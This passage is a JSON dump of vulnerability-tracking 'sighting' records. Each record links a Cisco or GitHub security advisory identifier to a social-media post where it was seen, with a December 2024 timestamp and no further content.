{"uuid": "722f7814-6cec-4091-b398-de671e6310a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190417-pnr", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793593024348", "content": "", "creation_timestamp": "2024-12-17T06:41:45.992660Z"}, {"uuid": "d6878f71-8fce-428b-b294-273ac6be800c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190227-wmda", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793604001035", "content": "", "creation_timestamp": "2024-12-17T06:41:46.476158Z"}, {"uuid": "56b9e9bb-f7b0-4999-88eb-268ac9a34cf7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190807-asa", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793666890201", "content": "", "creation_timestamp": "2024-12-17T06:41:48.823767Z"}, {"uuid": "68bd9224-f1ee-4fe1-98be-4e998430ce0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180620-vcse", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793809737841", "content": "", "creation_timestamp": "2024-12-17T06:41:50.102843Z"}, {"uuid": "36c191bb-acaf-4ae8-bb60-cb7e464362f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180905-umbrella", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794508385374", "content": "", "creation_timestamp": "2024-12-17T06:41:51.145395Z"}, {"uuid": "68895f1a-ffd2-4120-b512-2bb9ad2839a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190501-asa", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794528173407", "content": "", "creation_timestamp": "2024-12-17T06:41:51.306166Z"}, {"uuid": "a181713f-1cae-422c-9632-42389cd227e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190703-esa", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794652216265", "content": "", "creation_timestamp": "2024-12-17T06:41:52.388657Z"}, {"uuid": "12eef448-754f-4ec2-8197-006466df5129", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190501-pnr", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794671188407", "content": "", "creation_timestamp": "2024-12-17T06:41:52.549477Z"}, {"uuid": "30217ad2-85f4-4fbd-9dee-0bb7d633d6c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180516-fnd", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793029222247", "content": "", "creation_timestamp": "2024-12-17T06:41:18.583660Z"}, {"uuid": "239a97bb-2608-4968-8760-df7aa6e9e22e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190703-sbss", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793047282674", "content": "", "creation_timestamp": "2024-12-17T06:41:24.639082Z"}, {"uuid": "dfe29d5a-746a-45fd-85ee-aa022b2e773a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20181003-webex", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793613944583", "content": "", "creation_timestamp": "2024-12-17T06:41:47.677285Z"}, {"uuid": "10192943-1aeb-4956-bae9-d97a3c14c17c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190417-ise", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794397039731", "content": "", "creation_timestamp": "2024-12-17T06:41:50.604472Z"}, {"uuid": "3d6809a8-143f-4072-b912-c468a51cab64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190220-chn", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794403277855", "content": "", "creation_timestamp": "2024-12-17T06:41:50.733591Z"}, {"uuid": "80800beb-3c4b-4666-93c7-3a0ec4ee0c4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190619-imc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794428066552", "content": "", "creation_timestamp": "2024-12-17T06:41:50.796199Z"}, {"uuid": "428e7b3d-c10f-4c24-9aea-da8e85ebe5c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180620-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794789041150", "content": "", "creation_timestamp": "2024-12-17T06:41:53.325434Z"}, {"uuid": "95756984-5c13-422a-bcfc-46ba5b72eb07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190619-sdwan", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794951317979", "content": "", "creation_timestamp": "2024-12-17T06:41:54.308117Z"}, {"uuid": "5ee733c1-8837-48e0-b524-59141d23f6b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190619-prime", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793042756111", "content": "", "creation_timestamp": "2024-12-17T06:41:25.189834Z"}, {"uuid": "bc55d7bd-6c5b-4400-8063-b17e5a2ba40a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190327-evss", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793063635178", "content": "", "creation_timestamp": "2024-12-17T06:41:25.547936Z"}, {"uuid": "9a90a45a-a17a-430c-875b-31c830813f37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20181107-struts", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793083509969", "content": "", "creation_timestamp": "2024-12-17T06:41:25.814400Z"}, {"uuid": "420774da-7950-4e8a-8fc6-728e2efe8f5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190605-ece", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793090941495", "content": "", "creation_timestamp": "2024-12-17T06:41:27.059701Z"}, {"uuid": "256051ce-7eda-4859-82bd-337075832e48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180905-cimc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793121058834", "content": "", "creation_timestamp": "2024-12-17T06:41:28.896017Z"}, {"uuid": "69be4824-d6b9-4372-8985-4099c9ab0513", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20191016-ise", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793115947068", "content": "", "creation_timestamp": "2024-12-17T06:41:29.148287Z"}, {"uuid": "2be9ed60-a943-49da-8fa1-e107206c1ecc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20181003-ind", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793167333937", "content": "", "creation_timestamp": "2024-12-17T06:41:30.090755Z"}, {"uuid": "8021df70-df21-468d-bae6-c70a992d0625", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180418-iosxr", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793241685745", "content": "", "creation_timestamp": "2024-12-17T06:41:31.225718Z"}, {"uuid": "4961caee-50db-4b04-882e-04e42b0f4cce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190417-esa", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793539871871", "content": "", "creation_timestamp": "2024-12-17T06:41:42.598620Z"}, {"uuid": "86a7f05e-1128-4d4c-86d1-1d652a5038d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190123-miner", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793549854410", "content": "", "creation_timestamp": "2024-12-17T06:41:43.120882Z"}, {"uuid": "98a6ec0c-3b7e-45db-882b-d667084e7745", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180307-pdcnm", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794357907835", "content": "", "creation_timestamp": "2024-12-17T06:41:50.286244Z"}, {"uuid": "3d242b32-1161-4d1a-9565-2492345f3812", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20181003-imcs", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794409541585", "content": "", "creation_timestamp": "2024-12-17T06:41:50.673346Z"}, {"uuid": "bbec4446-7c7b-4c9d-9b36-3b7a1c07c7af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190925-iosxe", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794523233372", "content": "", "creation_timestamp": "2024-12-17T06:41:51.231072Z"}, {"uuid": "b2dafdb4-5b9c-4395-a65d-81ad7f059e55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190515-sb300sms", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794599921844", "content": "", "creation_timestamp": "2024-12-17T06:41:51.992185Z"}, {"uuid": "7380e748-d001-434a-9642-79109113441e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190904-ind", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794610062146", "content": "", "creation_timestamp": "2024-12-17T06:41:52.059220Z"}, {"uuid": "44f527d3-308e-4dd1-a8cd-7aef4147b072", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190731-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794684572123", "content": "", "creation_timestamp": "2024-12-17T06:41:52.684873Z"}, {"uuid": "c9a0f439-97f6-48bb-b7dd-584ce3c3f4e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180316-umb", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794842476253", "content": "", "creation_timestamp": "2024-12-17T06:41:53.612421Z"}, {"uuid": "c1835138-ea91-47fe-ba1b-7f7e09f05407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180328-igmp", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794890561736", "content": "", "creation_timestamp": "2024-12-17T06:41:53.906858Z"}, {"uuid": "0efc10a8-0dec-4bec-b789-47fef385519d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180502-ap", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793257033753", "content": "", "creation_timestamp": "2024-12-17T06:41:31.304647Z"}, {"uuid": "e8266bae-b620-4d38-ae1a-2c2e96994f76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20181003-uc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793266699702", "content": "", "creation_timestamp": "2024-12-17T06:41:31.369015Z"}, {"uuid": "2b2487ed-6413-4394-8a3a-35c3f730ee09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190925-isdn", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793279790263", "content": "", "creation_timestamp": "2024-12-17T06:41:31.672867Z"}, {"uuid": "5d7059a5-dc85-4fcc-8f07-1faef96400f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180620-fx", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793325805805", "content": "", "creation_timestamp": "2024-12-17T06:41:32.206876Z"}, {"uuid": "ba2c5c4c-b4f2-4dac-ace4-bf8c08d4e8c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20191120-vman", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793364166317", "content": "", "creation_timestamp": "2024-12-17T06:41:33.885440Z"}, {"uuid": "9e11228c-8e85-46ac-b66d-caf9f968b1c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180824-linux", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793399333692", "content": "", "creation_timestamp": "2024-12-17T06:41:35.562824Z"}, {"uuid": "d45df8d9-5c46-43a1-a4b0-aee18694a27f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180418-MATE1", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793462536923", "content": "", "creation_timestamp": "2024-12-17T06:41:38.193008Z"}, {"uuid": "eb1e1689-ebe6-495f-b034-35ee582ddbb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190821-imc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793483797672", "content": "", "creation_timestamp": "2024-12-17T06:41:38.759067Z"}, {"uuid": "12ac2e9d-d711-4580-9f15-39d8364512b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180129-asa1", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793493154807", "content": "", "creation_timestamp": "2024-12-17T06:41:39.517518Z"}, {"uuid": "0e30de5f-33f3-4efe-9e0a-9e87c7d2ee2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20181003-imcs", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793520465096", "content": "", "creation_timestamp": "2024-12-17T06:41:41.108465Z"}, {"uuid": "d96d883c-8f7b-4255-b930-ca24aad1ee9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180117-wms", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793525529100", "content": "", "creation_timestamp": "2024-12-17T06:41:41.280690Z"}, {"uuid": "468bcd9a-bbef-4419-8634-6f4c28b7a65f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180606-AnyConnect", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793777772105", "content": "", "creation_timestamp": "2024-12-17T06:41:49.880610Z"}, {"uuid": "3bcda867-d841-4a57-8ca7-eb9064447b6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190501-asa", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794423337300", "content": "", "creation_timestamp": "2024-12-17T06:41:50.858557Z"}, {"uuid": "e1f55a68-2b5a-4019-a784-2d3ad36579df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180502-ap", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794574749267", "content": "", "creation_timestamp": "2024-12-17T06:41:51.538410Z"}, {"uuid": "374ede8f-aae4-488d-88f9-0b3c153eae35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20181017-nexus", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794716343219", "content": "", "creation_timestamp": "2024-12-17T06:41:52.943046Z"}, {"uuid": "c42c1efc-e457-4534-b7db-907e38ea7977", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180718-sdwan", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794814816028", "content": "", "creation_timestamp": "2024-12-17T06:41:53.475325Z"}, {"uuid": "b21008c7-81c9-473b-a905-7add624aa72f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180418-ucm", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794965226054", "content": "", "creation_timestamp": "2024-12-17T06:41:54.454532Z"}, {"uuid": "10a23909-745c-477f-ab28-92ea762b304e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-567m-82f6-56rv", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681106551870483", "content": "", "creation_timestamp": "2024-12-19T19:20:25.792161Z"}, {"uuid": "01c1f9fb-90a9-43b7-80e2-4d927e53a21c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-675w-hf2m-qwmj", "type": "seen", "source": "https://bsky.app/profile/puppygirlhornypost2.transfem.social.ap.brid.gy/post/3ldoaohdgdki2", "content": "", "creation_timestamp": "2024-12-19T16:02:46.758600Z"}, {"uuid": "69ca6a5a-20c3-4885-b5bf-29504f11e3aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4fg7-vxc8-qx5w", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681851388329044", "content": "", "creation_timestamp": "2024-12-19T22:29:51.171428Z"}, {"uuid": "63fc0f15-5d50-45f9-ae10-bd861984d893", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-32gq-x56h-299c", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681851388329044", "content": "", "creation_timestamp": "2024-12-19T22:29:51.197778Z"}, {"uuid": "cbfe8210-bd30-46be-8510-fa18b8db15ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47h8-jmp3-9f28", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113681851388329044", "content": "", "creation_timestamp": "2024-12-19T22:29:51.225283Z"}, {"uuid": "8b7d8d10-5d4c-44e9-bfc3-c6f969ceccc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20200219-esa", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793628822550", "content": "", "creation_timestamp": "2024-12-17T06:41:48.177603Z"}, {"uuid": "a30d8342-3bc2-4ddb-8d15-2504b749d8a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190619-cms", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793639760813", "content": "", "creation_timestamp": "2024-12-17T06:41:48.260373Z"}, {"uuid": "2c4d31ba-d8d4-4134-86dd-a8cf2b29b0ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190306-nxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793674930967", "content": "", "creation_timestamp": "2024-12-17T06:41:49.104233Z"}, {"uuid": "6fb679a8-609b-46b9-b6d9-0ef73bf8d116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190717-sbss", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793709122916", "content": "", "creation_timestamp": "2024-12-17T06:41:49.166732Z"}, {"uuid": "1b4475da-97c6-4b87-b118-f22e39c4d907", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180815-wsa", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793735269885", "content": "", "creation_timestamp": "2024-12-17T06:41:49.588619Z"}, {"uuid": "15afeec5-9614-4e90-8cf8-8cc2a6b77db4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190404-rv", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793730481095", "content": "", "creation_timestamp": "2024-12-17T06:41:49.644953Z"}, {"uuid": "dc8c81b5-25ca-425b-b046-2abf021d8030", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190828-ucs", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793740479392", "content": "", "creation_timestamp": "2024-12-17T06:41:49.699660Z"}, {"uuid": "af10ec1d-044e-493f-bb68-f314dbcb92d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180418-asa1", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793750733381", "content": "", "creation_timestamp": "2024-12-17T06:41:49.762894Z"}, {"uuid": "14733732-a52d-402e-8aab-88e5e5a19a1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190123-webex", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793746125709", "content": "", "creation_timestamp": "2024-12-17T06:41:49.823213Z"}, {"uuid": "ad443494-b025-4fa4-922f-d53b7ab399ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190925-awr", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793767675787", "content": "", "creation_timestamp": "2024-12-17T06:41:49.940954Z"}, {"uuid": "bb947378-5051-4aab-8793-92664e908f46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190619-psc", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793801131646", "content": "", "creation_timestamp": "2024-12-17T06:41:50.041819Z"}, {"uuid": "d10aac69-07f0-428e-be63-60fb72ee0805", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180718-policy", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666793827013630", "content": "", "creation_timestamp": "2024-12-17T06:41:50.397300Z"}, {"uuid": "18d1f8cd-f162-4882-9644-35271c4631e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190821-ccx", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794377807316", "content": "", "creation_timestamp": "2024-12-17T06:41:50.480354Z"}, {"uuid": "fa2a6fe9-5f86-4935-9748-daf6c21cc9dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190619-rv", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794383861007", "content": "", "creation_timestamp": "2024-12-17T06:41:50.544221Z"}, {"uuid": "e877be43-ad5c-4e4c-b25c-d7f94570bd8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20190925-http", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794439690387", "content": "", "creation_timestamp": "2024-12-17T06:41:50.940264Z"}, {"uuid": "ab2d6af1-b570-4b83-83cc-2ef60b5f22ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180620-fxnxos", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794444456523", "content": "", "creation_timestamp": "2024-12-17T06:41:51.013398Z"}, {"uuid": "81f625df-a31c-40c5-bc49-e1fd8e802a23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cisco-sa-20180905-umbrella", "type": "seen", "source": "https://social.circl.lu/users/vulnerability_lookup/statuses/113666794543150725", "content": "", "creation_timestamp": 